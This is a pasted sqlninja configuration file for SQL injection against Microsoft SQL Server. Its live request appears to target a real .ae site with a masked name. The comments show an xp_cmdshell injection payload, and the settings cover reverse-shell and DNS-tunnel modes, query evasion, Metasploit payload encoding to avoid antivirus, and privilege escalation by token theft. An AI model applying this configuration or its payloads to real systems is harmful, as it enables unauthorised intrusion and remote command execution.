hooshmand

Untitled

Mar 30th, 2012
  1. ###################################
  2. # SQLNINJA CONFIGURATION FILE #
  3. ###################################
  4.  
  5. # options are case sensitive
  6. # see sqlninja-howto.html for more information and examples
  7.  
  8. ############ HTTP REQUEST ############
  9. # The entire HTTP request, including the exploit string and a marker for the
  10. # SQL command to execute (__SQL2INJECT__)
  11. # Be sure to include the vulnerable parameter and the character sequence that
  12. # allows us to start injecting commands. In general this means, at least:
  13. # - an apostrophe (if the parameter is a string)
  14. # - a semicolon (to end the original query)
  15. # It must also include everything necessary to properly close the original
  16. # query, like an appropriate number of closing brackets. Don't forget to
  17. # URL-encode, where needed (e.g. a space must become '%20' or '+')
  18. #
  19. # For instance, if you need to inject something like the following:
  20. # aaa=1&bbb=x';exec+master..xp_cmdshell+'dir+c:'--
  21. # then the parameter should look like this:
  22. # aaa=1&bbb=x';__SQL2INJECT__
  23. #
  24. # Make sure that:
  25. # 1. The --httprequest_start-- and --httprequest_end-- markers are in place
  26. # 2. All required headers are present
  27. # 3. There are no spaces at the beginning of a line
  28. # 4. There are no comment lines
  29. # Consider copying the exact request that triggers the injection from a proxy
  30. # intercept (e.g.: BurpSuite), if unsure
  31. #
  32. # GET EXAMPLE:
  33. --httprequest_start--
  34. GET http://?';__SQL2INJECT__ HTTP/1.0
  35. Host: www.?.ae
  36. User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
  37. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
  38. Accept-Language: en-us,en;q=0.7,it;q=0.3
  39. Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
  40. Content-Type: application/x-www-form-urlencoded
  41. Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
  42. Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
  43. Connection: close
  44. --httprequest_end--
  45. #
  46. # POST EXAMPLE: (The Content-Length Header is automatically added by sqlninja!)
  47. # --httprequest_start--
  48. # POST https://www.victim.com/page.asp HTTP/1.0
  49. # Host: www.victim.com
  50. # User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
  51. # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
  52. # Accept-Language: en-us,en;q=0.7,it;q=0.3
  53. # Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
  54. # Content-Type: application/x-www-form-urlencoded
  55. # Cookie: ASPSESSIONID=xxxxxxxxxxxxxxxxxxxx
  56. # Authorization: Basic yyyyyyyyyyyyyyyyyyyyy
  57. # Connection: close
  58. #
  59. # vulnerableparam=aaa';__SQL2INJECT__&otherparam=blah
  60. # --httprequest_end--
  61. #
  62. # HEADER-BASED EXAMPLE:
  63. # --httprequest_start--
  64. # GET http://www.victim.com/page.asp HTTP/1.0
  65. # Host: www.victim.com
  66. # User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Firefox/1.0.8
  67. # Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*
  68. # Accept-Language: en-us,en;q=0.7,it;q=0.3
  69. # Accept-Charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
  70. # Content-Type: application/x-www-form-urlencoded
  71. # Cookie: VulnCookie=xxx'%3B__SQL2INJECT__
  72. # Connection: close
  73. # --httprequest_end--
  74. #
  75. # Note that in the last example the semicolon was encoded, otherwise the server would not
  76. # parse __SQL2INJECT__ as part of VulnCookie
  77.  
  78. # Local host: your IP address (for backscan and revshell modes)
  79. lhost = ?
  80.  
  81. # Interface to sniff when in backscan mode
  82. device = eth1
  83.  
  84. # Evasion techniques to be used. Possible choices are:
  85. # 1 - Query hex-encoding
  86. # 2 - Comments as separators
  87. # 3 - Random case
  88. # 4 - Random URI encoding
  89. # All techniques can be combined, so the following is legal:
  90. evasion = 1234
  91. # However, keep in mind that using too many techniques at once leads to very
  92. # long queries, that might create problems when using GET. Default: no evasion
  93. # evasion = 12
  94.  
  95. # Path to metasploit executable. Only needed if msfpayload and
  96. # msfcli are not already in the path
  97. msfpath = /pentest/exploits/framework2
  98.  
  99. # Encoder to use with msfencode. If the option is not present, no encoding
  100. # is used. However, it's definitely recommended to use it, if you suspect that
  101. # an AV is present. A list of available encoders can be retrieved by simply
  102. # running "msfencoder -l"
  103. # msfencoder = x86/shikata_ga_nai
  104.  
  105. # Number of times to encode the metasploit payload. Default: 5
  106. # msfencodecount = 4
  107.  
  108. # If you can execute commands but SQL Server does not run as SYSTEM,
  109. # you can use churrasco.exe to steal the appropriate token and escalate
  110. # privileges. Enable this option to use churrasco.exe before executing
  111. # a command. This is especially useful with the metasploit module and VNC
  112. # Obviously, you first need to upload churrasco.exe using
  113. # the upload module!
  114. usechurrasco = no
  115.  
  116. # Proxy host to use (default: none)
  117. # proxyhost = 127.0.0.1
  118.  
  119. # Proxy port to use (default: 8080)
  120. # proxyport = 8080
  121.  
  122.  
  123. # Domain to use for dnstunnel mode
  124. domain = sqlninja.net
  125.  
  126. # tcpdump filter (optional)
  127. # filter = src host x.x.x.x
  128.  
  129. # Backscan timeout after web request conclusion (Default: 5 secs)
  130. timeout = 5
  131.  
  132. # Maximum hostname length for DNS tunnel (Max: 250 - Default: 250)
  133. # hostnamelength = 250
  134.  
  135. # IP address to return to DNS queries (default: 10.255.255.254)
  136. # resolvedip = 10.255.255.254
  137.  
  138. # Name of the procedure to use/create to launch commands. Default is
  139. # "xp_cmdshell". If set to "NULL", openrowset+sp_oacreate will be used
  140. # for each command
  141. # xp_name = xp_cmdshell
  142.  
  143. # Time value for the WAITFOR during inference attack of fingerprint and
  144. # bruteforce mode. A higher value makes things slower but will yield more
  145. # precise results against slow targets.
  146. # Min: 3 seconds. Max: 59 seconds. Default: 5 seconds
  147. blindtime = 10
  148.  
  149. # Number of script lines to upload with a single HTTP request. A higher number
  150. # obviously means a faster upload. However, do not push this too high if your
  151. # request contains very long parameters. Maximum is 30, and 10 is a safe
  152. # default that already provides good speed
  153. # lines_per_request = 10
  154.  
  155. # If the remote server returns a custom error page instead of a standard
  156. # HTTP error code (e.g. 500 Server Error), it is wise to set this value to
  157. # some string that is present in such a page. This will help sqlninja in
  158. # figuring out if things seem to be wrong
  159. # errorstring = "an error has occurred"
  160.  
  161. # By default, sqlninja appends two hyphens to the injected query in order
  162. # to comment out any spurious SQL code. This is good and works in
  163. # approximately 99% of the cases. However, you might want to change this
  164. # behavior in some very specific scenarios. Change this setting only if you
  165. # really know what you are doing.
  166. # Possible values: yes/no
  167. # appendcomment = yes
  168.  
  169. # When using the Metasploit module DEP is not a problem anymore, since in
  170. # all recent versions of the framework the stager will take care of it by
  171. # itself. However, if needed you can still roll back to the old sqlninja
  172. # behavior and disable DEP by whitelisting the stager with a call to
  173. # xp_regwrite. To do so, set 'checkdep' to 'yes'
  174. # checkdep = no
  175.  
  176. # You can override the standard marker used to detect where to inject the
  177. # sql attack code. You will probably never need to change this
  178. # sqlmarker = __SQL2INJECT__